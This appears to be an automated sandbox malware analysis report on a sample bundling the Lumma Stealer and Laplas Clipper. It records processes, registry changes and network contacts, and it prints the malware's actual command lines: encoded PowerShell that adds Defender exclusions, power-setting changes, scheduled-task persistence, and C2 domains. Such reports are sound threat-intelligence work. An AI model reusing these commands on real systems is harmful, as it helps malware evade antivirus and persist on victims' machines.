Malware Analysis Report

2024-10-19 01:12

Sample ID 230729-t8as9afa5z
Target ZenSoft.rar
SHA256 9f706ef0f596b25a281b45ce2e0ebb4fa0fb32b53d3e6e386fc5bdda68f46930
Tags
laplas lumma clipper persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9f706ef0f596b25a281b45ce2e0ebb4fa0fb32b53d3e6e386fc5bdda68f46930

Threat Level: Known bad

The file ZenSoft.rar was found to be: Known bad.

Malicious Activity Summary

laplas lumma clipper persistence spyware stealer

Laplas Clipper

Lumma Stealer

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

GoLang User-Agent

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-29 16:43

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-29 16:43

Reported

2023-07-29 16:47

Platform

win7-20230712-en

Max time kernel

122s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Processes

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 140.82.113.3:443 github.com tcp

Files

memory/2596-54-0x00000000778A0000-0x00000000778A2000-memory.dmp

memory/2596-56-0x00000000778A0000-0x00000000778A2000-memory.dmp

memory/2596-59-0x00000000776F0000-0x0000000077899000-memory.dmp

memory/2596-58-0x00000000778A0000-0x00000000778A2000-memory.dmp

memory/2596-60-0x000000013F090000-0x000000014240C000-memory.dmp

memory/2596-64-0x00000000776F0000-0x0000000077899000-memory.dmp

memory/2596-65-0x00000000776F0000-0x0000000077899000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-29 16:43

Reported

2023-07-29 16:47

Platform

win10v2004-20230703-en

Max time kernel

70s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

Signatures

Laplas Clipper

stealer clipper laplas

Lumma Stealer

stealer lumma

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4828 set thread context of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Enumerates physical storage devices

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4828 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4828 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3836 wrote to memory of 3024 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe
PID 3836 wrote to memory of 3024 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe
PID 3836 wrote to memory of 1804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe
PID 3836 wrote to memory of 1804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe
PID 3836 wrote to memory of 1804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe
PID 1804 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe C:\Windows\system32\cmd.exe
PID 3504 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3504 wrote to memory of 464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3504 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3504 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3504 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3504 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\4.exe
PID 3504 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\4.exe
PID 3504 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\4.exe
PID 2852 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 904 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 904 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 904 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\main\4.exe C:\Windows\SysWOW64\cmd.exe
PID 3024 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
PID 3024 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAANQA=

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAyADUA

C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe

"C:\Users\Admin\AppData\Local\Temp\nvsvnvnrdxbvm.exe"

C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe

"C:\Users\Admin\AppData\Local\Temp\kvcpenojxtvawxwh.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p151971033210090161381766327410 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "4.exe"

C:\Users\Admin\AppData\Local\Temp\main\4.exe

"4.exe"

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjAGkARQBvAGUAMQAyADEAdABkAEMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAEcASgBBAGIAUgBBADEAdABUACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEQAQwBMAGIAWQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlAGkARABpAGkAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGkARQBvAGUAMQAyADEAdABkAEMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAEcASgBBAGIAUgBBADEAdABUACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEQAQwBMAGIAWQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlAGkARABpAGkAIwA+AA=="

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7205" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 owen-wilson-wow-api.onrender.com udp
US 216.24.57.3:443 owen-wilson-wow-api.onrender.com tcp
US 8.8.8.8:53 3.57.24.216.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 update-vinc.in.net udp
NL 194.87.31.176:443 update-vinc.in.net tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 176.31.87.194.in-addr.arpa udp
US 8.8.8.8:53 gstatic-node.io udp
US 188.114.96.0:80 gstatic-node.io tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
N/A 194.50.153.183:80 194.50.153.183 tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 188.114.96.0:80 gstatic-node.io tcp
US 8.8.8.8:53 183.153.50.194.in-addr.arpa udp
US 188.114.96.0:80 gstatic-node.io tcp
